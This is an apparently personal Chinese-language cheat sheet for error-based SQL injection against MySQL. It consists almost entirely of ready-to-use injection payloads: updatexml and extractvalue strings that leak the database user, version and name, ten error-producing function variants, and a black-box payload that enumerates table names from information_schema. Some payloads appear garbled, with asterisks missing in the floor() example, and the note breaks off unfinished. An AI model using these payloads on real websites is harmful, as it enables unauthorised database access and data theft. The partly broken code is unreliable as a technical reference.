1,输入'看页面是否会返回报错,如果有则存在报错注入
2输入1'and info()#,这样报错页面就会显示数据库名
3, 获取数据库用户名
输入1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1))--+
你可以将user()换成version(),database() 来获取其他信息
但是采用 updatexml 报错函数 只能显示 32 长度的内容,如果获取的内容超过 32 字符就要采用字符串截取方法。每次获取 32 个字符串的长度。
除了 updatexml 函数支持报错注入外,mysql 还有很多函数支持报错。 1.floor() select * from test where id=1 and (select 1 from (select count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by x)a);
2.extractvalue() select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3.updatexml()select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection() select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint() select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon() select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7.multipolygon() select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8.linestring() select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9.multilinestring() select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10.exp() select * from test where id=1 and exp(~(select * from(select user())a));
黑盒注入
先通过1'and info# 来获取数据库的名字
再输入1'and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# 来获取表名
后面有待完善